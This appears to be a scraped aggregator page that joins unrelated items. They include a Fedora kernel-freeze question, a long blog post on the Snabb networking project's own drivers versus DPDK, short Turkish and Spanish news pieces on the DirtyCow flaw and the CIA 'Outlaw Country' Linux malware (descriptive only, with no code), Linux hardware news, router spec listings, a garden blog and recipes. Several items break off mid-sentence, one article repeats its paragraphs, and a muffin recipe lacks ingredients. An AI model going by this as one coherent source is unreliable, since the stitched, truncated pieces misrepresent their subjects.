Fedora freezes during shutdown and other commands on kernel kernel-4.11.7-200.fc25.x86_64, but not on kernel kernel-4.8.6-300.fc25.x86_64. ![image description](https://lh3.googleusercontent.com/nNlYqNwi3jys2x9k6srjK25pLQeZTkqUDO7DWQnPpcwMBq1UtRxBdSAT5MrUd07AN3UN2JFxzZZPZct-R1WcZk8qKE0lbt0k5razaC6xQ0JfRlrXXZThnLiexz11mRcMxA5xH04Ejq8fkexoKFN5e4SGkDh18p_B9O-IkwjCEU_BMoJ48I8gupxpFJBubjt8WvSAXBWPI6Tti_He34gJJlCfpajKlaSDGy6vTQTq0KP9YXWWiUAvx0zLI-8kftbg7RK5zpEG1g7MW6f9Rfj0vjmwwRus9XIErtkQXZFMJ01W7pJNuKrcez4Xu_vLxwes6PgGRauJE9cXLTq_n1mjBcCKZAST_4BKvFAeTt-IIUukEf_zAAKc2vArcyjKW2z4yzrpcvlJja6TZTSS_lbtsUrSJKgewqFtwTt9Ks51vyLoPH9ubqdRTp0zWExi6c4KIa0dnsEsqVmfRAjCE3n_sJFp7ZugQm9rafe8i2YBityaT4bfXlXY_HyMh3pCpA3yNzr5HMsQmY6fAfkBHl801k7C39n5ebS4s8uKPkqNjkO2b3nyJy0gvMEpiJVfw0VKVkd7r6Y6mS_1JeK8ZyzpabjEaiUEu4vI7OjvfMYvxgXrBn-N6P9h8nQD10aHNeCYJ8qW-sC0UXifCmHyy7YUFKoI0ERT7vr6ibykp904HQ=w1211-h909-no) The whole os also freezes when I type screenfetch on to the terminal, and I can not move anything. In both of these instances, I have to turn the power off manually. My laptop is a Dell XPS 9560. I do not know if this is relevant or not, but it has the 1050 graphics card. Please give me some ideas on how to fix this.
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Andy Wingo: encyclopedia snabb and the case of the foreign drivers   

Peoples of the blogosphere, welcome back to the solipsism! Happy 2017 and all that. Today's missive is about Snabb (formerly Snabb Switch), a high-speed networking project we've been working on at work for some years now.

What's Snabb all about you say? Good question and I have a nice answer for you in video and third-party textual form! This year I managed to make it to linux.conf.au in lovely Tasmania. Tasmania is amazing, with wild wombats and pademelons and devils and wallabies and all kinds of things, and they let me talk about Snabb.

Click to download video

You can check that video on the youtube if the link above doesn't work; slides here.

Jonathan Corbet from LWN wrote up the talk in an article here, which besides being flattering is a real windfall as I don't have to write it up myself :)

In that talk I mentioned that Snabb uses its own drivers. We were recently approached by a customer with a simple and honest question: does this really make sense? Is it really a win? Why wouldn't we just use the work that the NIC vendors have already put into their drivers for the Data Plane Development Kit (DPDK)? After all, part of the attraction of a switch to open source is that you will be able to take advantage of the work that others have produced.

Our answer is that while it is indeed possible to use drivers from DPDK, there are costs and benefits on both sides and we think that when we weigh it all up, it makes both technical and economic sense for Snabb to have its own driver implementations. It might sound counterintuitive on the face of things, so I wrote this long article to discuss some perhaps under-appreciated points about the tradeoff.

Technically speaking there are generally two ways you can imagine incorporating DPDK drivers into Snabb:

  1. Bundle a snapshot of the DPDK into Snabb itself.

  2. Somehow make it so that Snabb could (perhaps optionally) compile against a built DPDK SDK.

As part of a software-producing organization that ships solutions based on Snabb, I need to be able to ship a "known thing" to customers. When we ship the lwAFTR, we ship it in source and in binary form. For both of those deliverables, we need to know exactly what code we are shipping. We achieve that by having a minimal set of dependencies in Snabb -- only LuaJIT and three Lua libraries (DynASM, ljsyscall, and pflua) -- and we include those dependencies directly in the source tree. This requirement of ours rules out (2), so the option under consideration is only (1): importing the DPDK (or some part of it) directly into Snabb.

So let's start by looking at Snabb and the DPDK from the top down, comparing some metrics, seeing how we could make this combination.

snabbdpdk
Code lines 61K 583K
Contributors (all-time) 60 370
Contributors (since Jan 2016) 32 240
Non-merge commits (since Jan 2016) 1.4K 3.2K

These numbers aren't directly comparable, of course; in Snabb our unit of code change is the merge rather than the commit, and in Snabb we include a number of production-ready applications like the lwAFTR and the NFV, but they are fine enough numbers to start with. What seems clear is that the DPDK project is significantly larger than Snabb, so adding it to Snabb would fundamentally change the nature of the Snabb project.

So depending on the DPDK makes it so that suddenly Snabb jumps from being a project that compiles in a minute to being a much more heavy-weight thing. That could be OK if the benefits were high enough and if there weren't other costs, but there are indeed other costs to including the DPDK:

  • Data-plane control. Right now when I ship a product, I can be responsible for the whole data plane: everything that happens on the CPU when packets are being processed. This includes the driver, naturally; it's part of Snabb and if I need to change it or if I need to understand it in some deep way, I can do that. But if I switch to third-party drivers, this is now out of my domain; there's a wall between me and something that running on my CPU. And if there is a performance problem, I now have someone to blame that's not myself! From the customer perspective this is terrible, as you want the responsibility for software to rest in one entity.

  • Impedance-matching development costs. Snabb is written in Lua; the DPDK is written in C. I will have to build a bridge, and keep it up to date as both Snabb and the DPDK evolve. This impedance-matching layer is also another source of bugs; either we make a local impedance matcher in C or we bind everything using LuaJIT's FFI. In the former case, it's a lot of duplicate code, and in the latter we lose compile-time type checking, which is a no-go given that the DPDK can and does change API and ABI.

  • Communication costs. The DPDK development list had 3K messages in January. Keeping up with DPDK development would become necessary, as the DPDK is now in your dataplane, but it costs significant amounts of time.

  • Costs relating to mismatched goals. Snabb tries to win development and run-time speed by searching for simple solutions. The DPDK tries to be a showcase for NIC features from vendors, placing less of a priority on simplicity. This is a very real cost in the form of the way network packets are represented in the DPDK, with support for such features as scatter/gather and indirect buffers. In Snabb we were able to do away with this complexity by having simple linear buffers, and our speed did not suffer; adding the DPDK again would either force us to marshal and unmarshal these buffers into and out of the DPDK's format, or otherwise to reintroduce this particular complexity into Snabb.

  • Abstraction costs. A network function written against the DPDK typically uses at least three abstraction layers: the "EAL" environment abstraction layer, the "PMD" poll-mode driver layer, and often an internal hardware abstraction layer from the network card vendor. (And some of those abstraction layers are actually external dependencies of the DPDK, as with Mellanox's ConnectX-4 drivers!) Any discrepancy between the goals and/or implementation of these layers and the goals of a Snabb network function is a cost in developer time and in run-time. Note that those low-level HAL facilities aren't considered acceptable in upstream Linux kernels, for all of these reasons!

  • Stay-on-the-train costs. The DPDK is big and sometimes its abstractions change. As a minor player just riding the DPDK train, we would have to invest a continuous amount of effort into just staying aboard.

  • Fork costs. The Snabb project has a number of contributors but is really run by Luke Gorrie. Because Snabb is so small and understandable, if Luke decided to stop working on Snabb or take it in a radically different direction, I would feel comfortable continuing to maintain (a fork of) Snabb for as long as is necessary. If the DPDK changed goals for whatever reason, I don't think I would want to continue to maintain a stale fork.

  • Overkill costs. Drivers written against the DPDK have many considerations that simply aren't relevant in a Snabb world: kernel drivers (KNI), special NIC features that we don't use in Snabb (RDMA, offload), non-x86 architectures with different barrier semantics, threads, complicated buffer layouts (chained and indirect), interaction with specific kernel modules (uio-pci-generic / igb-uio / ...), and so on. We don't need all of that, but we would have to bring it along for the ride, and any changes we might want to make would have to take these use cases into account so that other users won't get mad.

So there are lots of costs if we were to try to hop on the DPDK train. But what about the benefits? The goal of relying on the DPDK would be that we "automatically" get drivers, and ultimately that a network function would be driver-agnostic. But this is not necessarily the case. Each driver has its own set of quirks and tuning parameters; in order for a software development team to be able to support a new platform, the team would need to validate the platform, discover the right tuning parameters, and modify the software to configure the platform for good performance. Sadly this is not a trivial amount of work.

Furthermore, using a different vendor's driver isn't always easy. Consider Mellanox's DPDK ConnectX-4 / ConnectX-5 support: the "Quick Start" guide has you first install MLNX_OFED in order to build the DPDK drivers. What is this thing exactly? You go to download the tarball and it's 55 megabytes. What's in it? 30 other tarballs! If you build it somehow from source instead of using the vendor binaries, then what do you get? All that code, running as root, with kernel modules, and implementing systemd/sysvinit services!!! And this is just step one!!!! Worse yet, this enormous amount of code powering a DPDK driver is mostly driver-specific; what we hear from colleagues whose organizations decided to bet on the DPDK is that you don't get to amortize much knowledge or validation when you switch between an Intel and a Mellanox card.

In the end when we ship a solution, it's going to be tested against a specific NIC or set of NICs. Each NIC will add to the validation effort. So if we were to rely on the DPDK's drivers, we would have payed all the costs but we wouldn't save very much in the end.

There is another way. Instead of relying on so much third-party code that it is impossible for any one person to grasp the entirety of a network function, much less be responsible for it, we can build systems small enough to understand. In Snabb we just read the data sheet and write a driver. (Of course we also benefit by looking at DPDK and other open source drivers as well to see how they structure things.) By only including what is needed, Snabb drivers are typically only a thousand or two thousand lines of Lua. With a driver of that size, it's possible for even a small ISV or in-house developer to "own" the entire data plane of whatever network function you need.

Of course Snabb drivers have costs too. What are they? Are customers going to be stuck forever paying for drivers for every new card that comes out? It's a very good question and one that I know is in the minds of many.

Obviously I don't have the whole answer, as my role in this market is a software developer, not an end user. But having talked with other people in the Snabb community, I see it like this: Snabb is still in relatively early days. What we need are about three good drivers. One of them should be for a standard workhorse commodity 10Gbps NIC, which we have in the Intel 82599 driver. That chipset has been out for a while so we probably need to update it to the current commodities being sold. Additionally we need a couple cards that are going to compete in the 100Gbps space. We have the Mellanox ConnectX-4 and presumably ConnectX-5 drivers on the way, but there's room for another one. We've found that it's hard to actually get good performance out of 100Gbps cards, so this is a space in which NIC vendors can differentiate their offerings.

We budget somewhere between 3 and 9 months of developer time to create a completely new Snabb driver. Of course it usually takes less time to develop Snabb support for a NIC that is only incrementally different from others in the same family that already have drivers.

We see this driver development work to be similar to the work needed to validate a new NIC for a network function, with the additional advantage that it gives us up-front knowledge instead of the best-effort testing later in the game that we would get with the DPDK. When you add all the additional costs of riding the DPDK train, we expect that the cost of Snabb-native drivers competes favorably against the cost of relying on third-party DPDK drivers.

In the beginning it's natural that early adopters of Snabb make investments in this base set of Snabb network drivers, as they would to validate a network function on a new platform. However over time as Snabb applications start to be deployed over more ports in the field, network vendors will also see that it's in their interests to have solid Snabb drivers, just as they now see with the Linux kernel and with the DPDK, and given that the investment is relatively low compared to their already existing efforts in Linux and the DPDK, it is quite feasible that we will see the NIC vendors of the world start to value Snabb for the performance that it can squeeze out of their cards.

So in summary, in Snabb we are convinced that writing minimal drivers that are adapted to our needs is an overall win compared to relying on third-party code. It lets us ship solutions that we can feel responsible for: both for their operational characteristics as well as their maintainability over time. Still, we are happy to learn and share with our colleagues all across the open source high-performance networking space, from the DPDK to VPP and beyond.


          For Love of a Good Book   
My introduction to books was not innocent—not in the least. I was three and curious. Specifically, I wanted to know where babies came from. My father, not the most comfortable of people, harrumphed, cleared his throat, and told me that he was too busy.     I resolved to get the needed information on my own. My uncle, who was in the Army, had stored his medical books in our attic. I had looked at them and knew those pictures contained the kernels of truth; but the words: what might those words
          DirtyCow: Görülmüş en büyük Linux kernel açığı   

Linux 2.6.22'den itibaren açık mevcut ve CentOS, Ubuntu, Debian, Red Hat vb. tüm sistemleri etkiliyor. Özetle sistem üzerindeki yetkisiz kullanıcı root yetkilerine erişebiliyor.

Açık iki şeye yol açıyor(muş)

  1. Sistem üzerinde yetkisiz bir kullanıcı bu açıktan istifade ederek read-only olan dosyalara yazma yetkisi sağlayabilir.
  2. Sistem üzerindeki kullanıcıya disk binarylerini modifiye etme ve uygun izinler sağlanmadan modifikasyon yapmayı engelleyen izin mekanizmasını devredışı bırakma imkanı sağlıyor.

Sistem bilgim iyi olmadığı için kaba bir çeviriyle yetindim, ilgilisine.

Kaynaklar

https://dirtycow.ninja/
https://github.com/dirtycow/dirtycow.github.io/wik...
https://www.youtube.com/watch?v=kEsshExn7aE
https://bobcares.com/blog/dirty-cow-vulnerability/ (çözüm)
http://arstechnica.com/security/2016/10/android-ph... (android)


          Wikileaks: La CIA desarrolla un malware para el Sistemas Operativos basados en Linux   

Wikileaks está desvelando en el programa Vault 7 en su página web todos los detalles sobre los cientos de herramientas de hackeo que tenía (y tiene) la CIA en su poder para todo tipo de dispositivos. Mientras que ayer conocimos Elsa, un malware para geolocalizar a usuarios a través del WiFi, hoy se ha desvelado Outlaw Country, el malware de la CIA para ordenadores con Linux.
 

Outlaw Country: utilizado para manipular paquetes de red de manera oculta en Linux

Mientras que prácticamente todo lo que Wikileaks ha desvelado de la CIA tiene que ver con malware para ordenadores con Windows, es especialmente destacable que Outlaw Country sea la primera herramienta pensada explícitamente para Linux, que como todos sabemos es mucho más seguro que otros sistemas operativos y parchea mucho más rápido sus vulnerabilidades.
 
Outlaw Country permite redirigir todo el tráfico saliente de un ordenador objetivo a ordenadores controlados por la CIA con el objetivo de poder robar archivos del ordenador infectado, o también para enviar archivos a ese ordenador.

El malware consiste en un módulo de kernel que crea tablas netfilter invisibles en el ordenador objetivo con Linux, con lo cual se pueden manipular paquetes de red. Conociendo el nombre de la tabla, un operador puede crear reglas que tengan preferencia sobre las que existen en las iptables, las cuales no pueden verse ni por un usuario normal ni incluso por el administrador del sistema.
 
Relacionado:https://www.adslzone.net/2017/06/01/es-realmente-mas-seguro-linux-que-windows/
 
Y es que Linux es muy utilizado en servidores, por lo que es un objetivo prioritario para la CIA, que busca infiltrarse de cualquier manera en redes ajenas para realizar labores de espionaje, como hemos visto con otras herramientas como Brutal Kangaroo o Pandemic. 
 
Outlaw Country permite redirigir todo el tráfico saliente de un ordenador objetivo a ordenadores controlados por la CIA con el objetivo de poder robar archivos del ordenador infectado, o también para enviar archivos a ese ordenador.
 
El malware consiste en un módulo de kernel que crea tablas netfilter invisibles en el ordenador objetivo con Linux, con lo cual se pueden manipular paquetes de red. Conociendo el nombre de la tabla, un operador puede crear reglas que tengan preferencia sobre las que existen en las iptables, las cuales no pueden verse ni por un usuario normal ni incluso por el administrador del sistema.
 

El último documento del malware data de 2015

El mecanismo de instalación y persistencia del malware no viene muy bien detallado en los documentos a las que tuvo acceso Wikileaks. Para poder hacer uso de este malware, un operador de la CIA tiene que hacer primero uso de otros exploits o puertas traseras para inyectar el módulo del kernel en el sistema operativo objetivo.
 
 
La versión de Outlaw Country 1.0 contiene un módulo para el kernel de la versión de 64 bits de CentOS/RHEL 6.x. La primera versión de esa rama fue publicada en 2011, mientras que la última fue lanzada en 2013, siendo la última disponible hasta verano de 2014 cuando llegó la versión 7. El módulo sólo funciona con los kernel por defecto, y además, la versión 1.0 del malware sólo soporta DNAT (Destination NAT) a través de la cadena PREROUTING.
 
La versión del documento que Wikileaks ha revelado tiene como fecha el 4 de junio de 2015. En ese mismo documento aparece referenciado como requisito utilizar la versión de CentOS 6.x o anterior, y que tenga como versión de kernel 2.6.32 (del año 2011) o inferior. No se sabe si la herramienta contaba con una versión más actualizada para versiones más recientes.
 
https://www.adslzone.net/2017/06/29/outlaw-country-wikileaks-desvela-malware-de-la-cia-para-linux/
 
------------

          Devices With Linux: Tesla Cars, 'Internet of Things', Intel Has a New Media SDK for Linux   
  • Tesla starts pushing new Linux kernel update, hinting at upcoming UI improvements

    Albeit being about 6 months late, Tesla finally started pushing the new Linux kernel update to the center console in its vehicles this week.

    While it’s only a backend upgrade, Tesla CEO Elon Musk associated it with several long-awaited improvements to the vehicle’s user interface. Now that the kernel upgrade is here, those improvements shouldn’t be too far behind.

    Sources told Electrek that the latest 8.1 update (17.24.30), upgraded the Linux Kernel from the version 2.6.36 to the version 4.4.35.

  • Is Ubuntu set to be the OS for Internet of Things?

    The Internet of Things has enjoyed major growth in recent years, as more and more of the world around us gets smarter and more connected.

    But keeping all these new devices updated and online requires a reliable and robust software background, allowing for efficient and speedy monitoring and backup when needed.

    Software fragmentation has already become a significant issue across the mobile space, and may threaten to do so soon in the IoT.

    Luckily, Canonical believes it can solve this problem, with its IoT Ubuntu Core OS providing a major opportunity for manufacturers and developers across the world to begin fully monetising and realising the potential of the new connected ecosystem.

  • What's New in Intel Media SDK 2017 R2 for Embedded Linux

    Among the key features this release enables is the Region of Interest (ROI) for HEVC encoder in constant and variable bitrate modes.

    Developers can now control the compression rate of specific rectangular regions in input stream while keeping the bitrate target. This makes it possible, for example, to reduce compression of the areas where the viewer needs to see more details (e.g. faces or number plates), or to inrease it for the background with complicated texture that otherwise would consume majority of the bandwidth. ROI can also be used to put a privacy mask on certain regions that have to be blurred (e.g. logos or faces).


          New Kernels and Linux Foundation Efforts   
  • Four new stable kernels
  • Linux Foundation Launches Open Security Controller Project

    he Linux Foundation launched a new open source project focused on security for orchestration of multi-cloud environments.

    The Open Security Controller Project software will automate the deployment of virtualized network security functions — such as firewalls, intrusion prevention systems, and application data controllers — to protect east-west traffic inside the data center.

  • Open Security Controller: Security service orchestration for multi-cloud environments

    The Linux Foundation launched the Open Security Controller project, an open source project focused on centralizing security services orchestration for multi-cloud environments.

  • The Linux Foundation explains the importance of open source in autonomous, connected cars

    Open source computing has always been a major boon to the world of developers, and technology as a whole. Take Google's pioneering Android OS for example, based on the open source code, which can be safely credited with impacting the world of everyday technology in an unprecedented manner when it was introduced. It is, hence, no surprise when a large part of the automobile industry is looking at open source platforms to build on advanced automobile dynamics.


          GNU/Linux Boards: Orange Pi, Le Potato, and Liteboard   
  • Orange Pi Plus 2e OS Installation

    Similar to the Raspberry Pi is the Orange Pi series of single board systems.

    These single boards are not compatible with the Operating System (OS) images for Raspberry Pi. In this article we will cover installing and setting up an OS.

  • New Libre-Focused ARM Board Aims To Compete With Raspberry Pi 3, Offers 4K

    There's another ARM SBC (single board computer) trying to get crowdfunded that could compete with the Raspberry Pi 3 while being a quad-core 64-bit ARM board with 4K UHD display support, up to 2GB RAM, and should be working soon on the mainline Linux kernel.

    The "Libre Computer Board" by the Libre Computer Project is this new Kickstarter initiative, in turn is the work of Shenzhen Libre Technology Co. Through Kickstarter the project is hoping to raise $50k USD. The board is codenamed "Le Potato."

    Le Potato is powered by a quad-core ARM Cortex-A53 CPU while its graphics are backed by ARM Mali-450. Connectivity on the board includes HDMI 2.0, 4 x USB 2.0, 100Mb, eMMC, and microSD. Sadly, no Gigabit Ethernet or USB 3.0. Unlike the Raspberry Pi 3, it also goes without onboard WiFi/Bluetooth.

  • Open spec, sandwich-style SBC runs Linux on i.MX6UL based COM

    Grinn and RS Components unveiled a Linux-ready “Liteboard” SBC that uses an i.MX6 UL LiteSOM COM, with connectors compatible with Grinn Chiliboard add-ons.

    UK-based distributor RSA Components is offering a new sandwich-style SBC from Polish embedded firm Grinn. The 60-Pound ($78) Liteboard, which is available with schematics, but no community support site, is designed to work with the separately available, SODIMM-style LiteSOM computer-on-module. The LiteSOM sells for 25 Pounds ($32) or 30 Pounds ($39) with 2GB eMMC flash. It would appear that the 60-Pound Liteboard price includes the LiteSOM, but if so, it’s unclear which version. There are detailed specs on the module, but no schematics.


          Harvest Mostly In   

Last night was our first freeze of the season. I scrambled to take in everything I could that I had not already brought in. As dusk hit and daylight quickly receded, I was pulling bean pods half-blindly. I noticed myself relying more on my sense of touch and less on straining my eyes to discern bean pods from stalks and felted leaves. While I may not have picked every last pod, I did fill a 2 gallon bucket to over-brimming.

The best part of my evening was actually sitting and removing the yin yang beans from their pods. After so many days this week of absorbing current economic events, it was relaxing to sit by a warm fire and watch my harvest amount to a humble, yet substantial hill of beans.


About a week ago, before regular rains returned to our area, I brought in the Indian corn to dry. I can't really explain to you how magical it was to pull back the different hued husks and find jewel-toned kernels shining in unpredictable colors beneath. That was quite a memorable moment.

There are still apples to be brought in from the frosts and fall veggies to be transplanted into their winter beds. The garden season is nearing a close but it remains a race to the finish.
          Offer - WR562-S - CHINA   
WR562-S              300Mbps wireless rate IEEE 802.3af/at 48v POE power supply AP            Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            Safe and stable IEEE 802.3af/at POE power supply.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power InputWR51-S: POE(802.3af/at),Voltage:48VInterface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR511 - CHINA   
WR511            Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.24v non-standard POE with 45+ 78- wire core of cable. and Support 9-24v wide voltage supplyQualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power InputSimplified POE(45+ 78-),Voltage:9-24VInterface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR511-D - CHINA   
WR511-D            Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            External 9v DC power adapter supply, and the lower right corner is the DC socket.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power Input9V Power adapter supply Interface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR513-S - CHINA   
WR513-S               Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            Safe and stable IEEE 802.3af/at POE power supply.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power InputWR51-S: POE(802.3af/at),Voltage:48VInterface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR510 - CHINA   
WR510             Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.24v non-standard POE with 45+ 78- wire core of cable. and Support 9-24v wide voltage supplyQualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power InputSimplified POE(45+ 78-),Voltage:9-24VInterface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR512-D - CHINA   
WR512-D            Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            External 9v DC power adapter supply, and the lower right corner is the DC socket.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power Input9V Power adapter supply Interface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR510-D - CHINA   
WR510-D             Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            External 9v DC power adapter supply, and the lower right corner is the DC socket.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power Input9V Power adapter supply Interface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Offer - WR513-AC - CHINA   
WR513-AC               Product features:Strong wireless coverage with high gain MIMO antenna Inside.      Optional various colors, and can also be customized color.            110-220v AC power supply AP ,and the AC connection is in the back of product.Qualcomm Atheros MCU with MIPS 24K kernel Inside with high performance and high stability.The external power switch can be locked to face the use of hotels, and be valid home used.Terminal Roaming effect can be achieved in a local wireless network with APs.Support soft AC software for Centralized management.Support MAC address white list to guarantee access security.Gateway/AP Mode supported            SpecificationHARDWARE FEATURESMCU ChipsetQualcomm Atheros AR9331Power Input110-220v AC power supplyInterface1 10/100Mbps WAN Port,Auto MDI/MDIX1 10/100Mbps LAN Port,Auto MDI/MDIX1 Reset Button1 Power ButtonWireless StandardsIEEE 802.11n, IEEE 802.11g, IEEE 802.11bAntenna TypeInside 5dbi high gain MIMO antenna WIRELESS FEATURESFrequency2.4-2.4835GHzchannel1-13Signal Rate11n: Up to 150Mbps(dynamic)11g: Up to 54Mbps(dynamic)11b: Up to 11Mbps(dynamic)EIRP
          Mexicali Fritata Recipe   
 One of my favorite things to make is a frittata. They are easy and you can be very creative with your ingredients. Guests at our bed and breakfast always seem to enjoy them, which really makes me happy.

I love Mexican food and when sisters Nadine and Sandy, who visit our inn often, told me they loved it too, I decided to see if I could come up with a recipe for a frittata that they and their husbands would enjoy. I have been serving this now for a couple of years and I want to share it with you.

When I make this, I use 2 glass, 8 x 8 dishes because it bakes quicker and more evenly than using a larger dish. If I am serving 10 guests for breakfast, I use 3 dishes.

Jan’s Mexicali Frittata

Serves 8
10 eggs
1 teaspoon sea salt
Lemon pepper
½ teaspoon onion powder
½ teaspoon garlic powder
Chopped fresh cilantro
Dollop low fat or fat-free sour cream
4 small shallots, sliced
1 cup black beans, rinsed and drained
1 cup roasted corn kernels, Trader Joe’s frozen-thawed and drained
2 small cans mild green chilies, drained
¼ cup sundried tomatoes, cut in small pieces
1 cup milk or Sour Cream
Mexican cheese blend with spices (about a cup – more if you like real cheesy)
4 small corn tortillas

Topping:  1 cup sour cream, 1 cup salsa, chopped parsley, chopped cilantro

Preheat oven to 375. Spray 2 square baking dishes liberally with cooking spray.  Put a light layer of the cheese blend on the bottom of the dish. Cut tortillas in half and cover bottom of baking dishes.  Layer shallots, black beans, roasted corn, chilies, cilantro, cheese blend, and sundried tomatoes.  Whip eggs with onion powder, garlic powder, small amount of low fat sour cream, sea salt, lemon pepper, and milk. Add parsley and cilantro.  Pour egg mixture evenly over layered veggies.  Finish off with another light layer of cheese blend.  Bake for about 30 minutes or until set. Cool for 5 minutes, cut into triangles or squares.
Top each serving with a dollop of sour cream, salsa, and sprinkle with cilantro and parsley.

This dish is great served warm or at room temperature. For breakfast, I love to serve this with chunks of peach & chipotle chicken sausage and pineapple that have been skewered and baked in the oven for about 15 minutes. Yum, yum.
          Rosemary-Roasted Corn Muffins - Cape Cod Bed and Breakfast Recipe   
 We serve many kinds of freshly baked muffins at our Cape Cod Bed and Breakfast. One of the most popular with our guests is Rosemary-Roasted Corn Muffins made with corn meal that is ground at the historic Dexter Grist Mill. The mill is just across the street from the Inn and is one of the oldest operating grist mills in the country. It is one of the few mills that still uses water power to grind corn. The meal is packaged and sold on site. It is a bit more coarsely ground that other corn meals and has no preservatives. When used in muffins, it provides a wonderful texture. Many of our guests purchase the corn meal to take home with them when they visit the mill.

If you do not have roaster corn kernels, plain ones can be substituted. These muffins are also great made with blueberries instead of corn kernels.

